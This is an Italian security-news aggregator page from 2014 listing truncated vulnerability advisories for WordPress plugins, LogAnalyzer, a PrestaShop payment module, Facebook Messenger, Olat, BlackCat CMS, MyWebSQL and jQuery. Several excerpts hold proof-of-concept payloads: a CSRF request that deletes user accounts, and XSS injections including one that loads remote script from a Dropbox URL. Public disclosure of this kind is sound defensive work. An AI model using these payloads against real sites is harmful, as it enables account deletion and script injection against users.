WordPress Plugin Vulnerability Dump – Part 2

10 settembre 2014 - Fonte: http://www.mondounix.com
More vulnerabilities in poorly coded plugins for y'all.
 
Ninja Forms v2.77 - Authorization bypass (regular users can delete forms, etc)
Contact Form v3.83 - Email header injection
WP to Twitter v2.9.3 - Authorization bypass (regular users can tweet to the admin's twitter account)
Xhanch - My Twitter v2.7.7 - CSRF (create and delete tweets)
TinyMCE Advanced v4.1 - (insignificant) CSRF
W3 Total Cache v0.9.4 - (minor) CSRF
WordPress Download Manager v2.6.92 - Authorization bypass (regular users can upload/delete arbitrary files, yes, even 
php files)
Wordfence Security v5.2.2 - Stored XSS
 
Details and POCs located: https://vexatioustendencies.com/wordpress-plugin-vulnerability-dump-part-2/
 
More to follow.
 
-Voxel...

Leggi il seguito »

WordPress Bulk Delete Users By Email 1.0 CSRF

9 settembre 2014 - Fonte: http://www.mondounix.com
# Exploit Title: Bulk Delete Users by Email, Wordpress Plugin 1.0 - CSRF
# Google Dork: N/A
# Date: 05.09.2014
# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
# Vendor Homepage - http://www.speakdigital.co.uk/
# Software Link: https://wordpress.org/plugins/bulk-delete-users-by-email/
# Version: 1.0
# Tested on: PHP
 
 
Description:
This plugin will allow administrator to delete user(s) account by entering
their email address.
 
Proof of Concept
1. Force the administrator to send below request:
 
URL :
http://localhost/blog/wp-admin/admin.php?page=bulk-delete-users-by-email/plugin.php
METHOD : POST
REQUEST : de-text=<victim email>&submit=Search+and+Delete
 
* As the result,...

Leggi il seguito »

Sakis3G, il 3G semplice senza NetworkManager

7 settembre 2014 - Fonte: http://www.osside.net

sakis236
Rientrando a casa dopo un succoso mega aggiornamento scopro che il NetworkManager di Debian testing non mi connetteva più in 3g ne con la la chiavetta Huawei ne con la Onda: led lampeggiante fisso su entrambi i computer.

Dopo aver controllato se ci fosse effettivamente credito disponibile ho scoperto Sakis3G un programmino davvero semplice ed efficace che connette la mia chiavetta con una stabilità mai riscontrata prima, il NetworkManager mi dava infatti spesso problemi in particolare nella seconda riconnessone.

In...

Leggi il seguito »

LogAnalyzer 3.6.5 Cross Site Scripting

7 settembre 2014 - Fonte: http://www.mondounix.com
Author: Dolev Farhi @dolevff
Application: LogAnalyzer
Date: 8.2.2014
Tested on: Red Hat Enterprise Linux 6.4
Relevant CVEs: CVE-2014-6070
 
 
1. About the application
------------------------
LogAnalyzer is a web interface to syslog and other network event data. 
It provides easy browsing, analysis of realtime network events and 
reporting services.
 
 
2. Vulnerabilities Descriptions:
-----------------------------
It was found that an XSS injection is possible on a syslog server 
running LogAnalyzer version 3.6.5.
by changing the hostname of any entity logging to syslog server with 
LogAnalyzer to <script>alert("xss")</script>, and sending an arbitrary
syslog message, a client-side script...

Leggi il seguito »

Mpay24 prestashop payment module multiple vulnerabilities

7 settembre 2014 - Fonte: http://www.mondounix.com
 Mpay24 PrestaShop Payment Module Multiple Vulnerabilities
 
   - ·         Affected Vendor: Mpay24
   - ·         Affected Software: Mpay24 Payment Module
   - ·         Affected Version: 1.5 and earlier
   - ·         Issue Type: SQL injection and information disclosure
   - ·         Notification Date: 10 February 2014
   - ·         Release Date: 03 September 2014
   - ·         Discovered by: Eldar Marcussen
   - ·         Issue status: Patch available
 
Summary
 
BAE Systems Applied Intelligence researcher, Eldar Marcussen has identified
two high impact vulnerabilities in the Mpay24 payment module for the
Prestashop e-commerce solution.
 
“Mpay24 is the online-payment platform for e- and m-commerce...

Leggi il seguito »

Facebook Messenger / App MIME Sniffing Cross Site Scripting

7 settembre 2014 - Fonte: http://www.mondounix.com
I. VULNERABILITY
-------------------------
Reflected XSS Attacks vulnerabilities used MIME Sniffing in Facebook
Messenger and Facebook App for iOS.
 
II. BACKGROUND
-------------------------
Facebook is a social networks
 
III. DESCRIPTION
-------------------------
Has been detected a Reflected XSS vulnerability by MIME Sniffing.
The code injection is done through chat use send file.
IV. PROOF OF CONCEPT
-------------------------
The application does not validate the contente of file send, only
valitation of extention.
Content of file face.jjjj:
<script src="https://www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1">
</script>
Content of file face.js:
alert("Alert XSS Chat send File Facebook...

Leggi il seguito »

Olat Stored Cross Site Scripting

7 settembre 2014 - Fonte: http://www.mondounix.com
# Affected software: //demo.olat.org/
# Discovered by: Provensec
# Website: http://www.provensec.com
# Type of vulnerability: Stored XSS
# Author: Ankit Bharathan ,Provensec labs
# Description: Goto personal folder open any folder and create a new
document xss.tct
and then edit it fill field with "><img src=d
onerror=confirm(/provensec/);>
 
Then open folder and in new tab
example:
 
http://demo.olat.org/olat/auth/1%3A2%3A1001302707%3A6%3A0%3Aserv%3Ax/public/dddd.tct.html

(5)

...

Leggi il seguito »

BlackCat CMS Reflected Cross-Site Scripting (XSS)

6 settembre 2014 - Fonte: http://www.mondounix.com
Advisory ID: HTB23228
Product: BlackCat CMS
Vendor: Black Cat Development
Vulnerable Version(s): 1.0.3 and probably prior
Tested Version: 1.0.3
Advisory Publication:  August 13, 2014  [without technical details]
Vendor Notification: August 13, 2014 
Vendor Patch: August 13, 2014 
Public Disclosure: September 3, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-5259
Risk Level: Medium 
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech...

Leggi il seguito »

MyWebSQL 3.4 Cross Site Scripting

6 settembre 2014 - Fonte: http://www.mondounix.com
Advisory ID: HTB23221
Product: MyWebSQL
Vendor: http://mywebsql.net/
Vulnerable Version(s): 3.4 and probably prior
Tested Version: 3.4
Advisory Publication:  June 25, 2014  [without technical details]
Vendor Notification: June 25, 2014 
Public Disclosure: September 3, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-4735
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab...

Leggi il seguito »

JQuery 1.4.2 Cross Site Scripting

3 settembre 2014 - Fonte: http://www.mondounix.com
XSS Reflected JQuery 1.4.2 - Create object option in runtime client-side
From: Mauro Risonho de Paula Assumpção
Date: 02.09.2014 13:21:20 -0300
 
VSLA Security Advisory FIRE-XSS-Reflected-Jquery 1.4.2 2014-001:
XSS Reflected JQuery 1.4.2
 
LEVEL: MEDIUM
In our tests authorized by the customer, we can stop the entire plant.
 
Published: 09/01/2014
Version: 1.0
 
Vendor: Jquery (https://jquery.org/)
Product: Jquery 1.4.2 (
http://blog.jquery.com/2010/02/19/jquery-142-released/)
Version affected: 1.4.2
 
Product description:
Jquery is a open source software.
jQuery is a cross-platform JavaScript library designed to simplify the
client-side scripting of HTML(1).
 
Credit: Mauro Risonho de Paula Assumpção...

Leggi il seguito »